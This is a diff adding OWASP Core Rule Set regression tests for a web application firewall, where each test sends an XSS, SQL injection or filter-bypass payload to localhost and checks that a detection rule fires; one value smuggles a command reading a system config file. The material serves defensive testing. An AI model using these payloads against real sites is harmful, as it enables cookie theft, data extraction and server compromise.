mode 100644 index 00000000..b1e5f383 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml 
@@ -0,0 +1,167 @@ +--- +meta: + author: "Andrea Menin" + description: None + enabled: true + name: 941370.yaml +tests: + - test_title: 941370-1 + desc: "Bypass using comment in syntax and multiple whitespaces" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-2 + desc: "Bypass using comments in syntax" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-3 + desc: "Bypass using JavaScript global variables" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-4 + desc: "Bypass using JavaScript global variables and comments in syntax" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id 
"941370" + - test_title: 941370-5 + desc: "Bypass using JavaScript global variables and string concatenation" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-6 + desc: "Bypass using JavaScript global variables and comments in syntax" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-7 + desc: "Bypass using JavaScript global variables and jQuery globalEval" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-8 + desc: "Bypass using JavaScript global variables and hex escape sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%22%5Cx24%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-9 + desc: 
"Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=%28document%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-10 + desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml new file mode 100644 index 00000000..48c4ed59 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml 
@@ -0,0 +1,24 @@
+---
+meta:
+ author: "Franziska Buehler"
+ description: None
+ enabled: true
+ name: 941380.yaml
+tests:
+ - test_title: 941380-1
+ desc: "AngularJS client side template injection detection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: '/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff'
+ # /login?user={{constructor.constructor('alert(1)')()}}
+ version: HTTP/1.1
+ output:
+ log_contains: id "941380"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
new file mode 100644
index 00000000..fd208ee7
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
@@ -0,0 +1,151 @@ +--- +meta: + author: "Franziska Buehler, Xhoenix" + description: None + enabled: true + name: 941390.yaml +tests: + - test_title: 941390-1 + desc: "JavaScript method setInterval(code, 1)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=setInterval%28code%2C%201%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-2 + desc: "JavaScript method: arg=x\";setTimeout(name, 1)//" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-3 + desc: "JavaScript method eval('2 + 2')" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=eval%28%272%20%2B%202%27%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-4 + desc: "JavaScript constructor new Function()" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=new%20Function%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-5 + desc: "JavaScript call alert" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=alert%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-6 + desc: "JavaScript call atob" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=atob%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-7 + desc: "JavaScript call btoa" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=btoa%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-8 + desc: "JavaScript call prompt" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?arg=prompt%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-9 + desc: "JavaScript call confirm" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?arg=confirm%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" 
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml
new file mode 100644
index 00000000..80807d76
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml
@@ -0,0 +1,119 @@ +--- +meta: + author: "Andrea Menin" + description: None + enabled: true + name: 941400.yaml +tests: + - test_title: 941400-1 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-2 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-3 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-4 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60' + version: HTTP/1.1 + output: + 
log_contains: id "941400" + - test_title: 941400-5 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-6 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-7 + desc: "Status Page Test - JavaScript minimal test with Reflect.sort.call``" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?test=Reflect.sort.call%60%60' + version: HTTP/1.1 + output: + log_contains: id "941400" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml new file mode 100644 index 00000000..7127cc95 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml 
@@ -0,0 +1,245 @@ +--- +meta: + author: "Christian Folini" + description: Various SQL injection tests + enabled: true + name: 942100.yaml +tests: + - test_title: 942100-1 + desc: "Simple SQL Injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1234 OR 1=1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-2 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=-1839' or '1'='1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-3 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=-1839\" or \"1\"=\"2" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-4 + desc: "Basic SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-5 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue' and 526=527" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-6 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=foo') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-7 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-8 + desc: "Simple SQL Injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-9 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 
942100-10 + desc: "Advanced SQL Injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "1'||(select extractvalue(xmltype('%toyop;" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-11 + desc: "Simple function call" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-12 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-13 + desc: "Advanced injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\" | type %SystemDrive%\\\\config.ini | \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-14 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
method: POST + port: 80 + uri: "/" + data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" + version: HTTP/1.0 + output: + log_contains: id "942100" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml new file mode 100644 index 00000000..8b685625 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml 
@@ -0,0 +1,183 @@ +--- +meta: + author: "Christian Folini, Matteo Pace" + description: Various SQL injection tests + enabled: true + name: 942101.yaml +tests: + - test_title: 942101-1 + desc: "Simple SQL Injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/1234%20OR%201=1" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-2 + desc: "Basic SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-3 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/EmptyValue'%20and%20526=527" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-4 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-5 + desc: "Simple function call" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-6 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-7 + desc: "SQL Injection at the last segment of the path (request_basename detection)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/24'union+all+select+1,2,3+from+aa" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-8 + desc: "SQL Injection inside the path (request_filename detection)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/24'union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-9 + desc: "SQL Injection inside the path with comment block (request_filename detection)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/%2A/%2A/2+union+all/bar" + version: HTTP/1.0 + output: + 
log_contains: id "942101" + - test_title: 942101-10 + desc: "Negative test with incomplete SQL command inside the path" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/9'union+all/bar" + version: HTTP/1.0 + output: + no_log_contains: id "942101" + - test_title: 942101-11 + desc: "Negative test with complete SQL command inside the path, but without comma" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/24+union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + no_log_contains: id "942101" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml new file mode 100644 index 00000000..40a2e88b --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml 
@@ -0,0 +1,40 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942110.yaml
+tests:
+ - test_title: 942110-1
+ desc: "Common SQL Injection Testing"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ # NB: false positives: /?var=\'\'
+ data: "var=%27%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942110"
+ - test_title: 942110-2
+ desc: "Common SQL Injection Testing on filename"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ uri: "/foo/'%7c%7c1==1|'"
+ port: 80
+ version: HTTP/1.0
+ output:
+ log_contains: id "942110"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
new file mode 100644
index 00000000..b2cf47bc
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
@@ -0,0 +1,674 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler" + description: None + enabled: true + name: 942120.yaml +tests: + - test_title: 942120-1 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=blahblah&var2=LIKE%20NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-2 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=RegExp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-3 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ">>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-4 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 